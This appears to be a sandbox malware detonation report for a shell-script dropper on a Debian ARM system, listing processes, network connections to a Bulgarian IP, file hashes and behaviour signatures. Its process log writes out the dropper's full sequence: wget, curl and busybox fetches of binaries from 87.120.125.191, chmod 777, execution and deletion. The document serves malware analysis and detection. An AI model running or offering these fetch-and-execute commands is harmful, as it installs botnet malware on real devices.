/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh

[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/rm

[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/wget

[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/chmod

[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq

[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/rm

[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
GB 89.187.167.7:443 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 02:53

Reported

2024-11-20 02:55

Platform

debian9-armhf-20240611-en

Max time kernel

51s

Max time network

56s

Command Line

[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 N/A
N/A /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU N/A
N/A /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 N/A
N/A /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 N/A
N/A /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT N/A
N/A /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC N/A
N/A /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 N/A
N/A /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f N/A
N/A /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY N/A
N/A /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl N/A
N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY N/A
N/A /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh N/A
N/A /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq N/A
N/A /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 N/A
N/A /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU N/A
N/A /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 N/A
N/A /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 N/A
N/A /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT N/A
N/A /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC N/A
N/A /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 N/A
N/A /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f N/A
N/A /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY N/A
N/A /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /usr/bin/curl N/A
File opened for modification /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /usr/bin/curl N/A
File opened for modification /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY /usr/bin/curl N/A
File opened for modification /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /usr/bin/curl N/A
File opened for modification /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /usr/bin/curl N/A
File opened for modification /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /usr/bin/curl N/A
File opened for modification /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT /usr/bin/curl N/A
File opened for modification /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /usr/bin/curl N/A
File opened for modification /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /usr/bin/curl N/A
File opened for modification /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl /usr/bin/curl N/A
File opened for modification /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw /usr/bin/curl N/A
File opened for modification /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /usr/bin/curl N/A
File opened for modification /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 /usr/bin/curl N/A
File opened for modification /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC /usr/bin/curl N/A
File opened for modification /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 /usr/bin/curl N/A
File opened for modification /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /usr/bin/curl N/A
File opened for modification /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 /usr/bin/curl N/A
File opened for modification /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU /usr/bin/curl N/A
File opened for modification /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh /usr/bin/curl N/A
File opened for modification /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq /usr/bin/curl N/A
File opened for modification /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /usr/bin/curl N/A
File opened for modification /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 /usr/bin/curl N/A
File opened for modification /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f /usr/bin/curl N/A
File opened for modification /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY /usr/bin/curl N/A

Processes

/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh

[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/chmod

[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/rm

[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/wget

[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/chmod

[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU

[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/rm

[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/wget

[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/chmod

[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1

[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/bin/rm

[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]

/usr/bin/wget

[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/chmod

[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7

[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/bin/rm

[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]

/usr/bin/wget

[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/chmod

[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT

[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/bin/rm

[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]

/usr/bin/wget

[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/chmod

[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC

[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/bin/rm

[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]

/usr/bin/wget

[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/chmod

[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4

[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/bin/rm

[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]

/usr/bin/wget

[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/chmod

[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f

[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/bin/rm

[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]

/usr/bin/wget

[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/chmod

[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY

[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/bin/rm

[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]

/usr/bin/wget

[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/chmod

[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl

[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/bin/rm

[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]

/usr/bin/wget

[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/chmod

[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw

[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/bin/rm

[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]

/usr/bin/wget

[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/chmod

[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY

[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/bin/rm

[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]

/usr/bin/wget

[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/chmod

[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh

[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/bin/rm

[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]

/usr/bin/wget

[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/chmod

[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq

[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/bin/rm

[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]

/usr/bin/wget

[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/chmod

[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1

[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/bin/rm

[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]

/usr/bin/wget

[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/bin/chmod

[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]

/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU

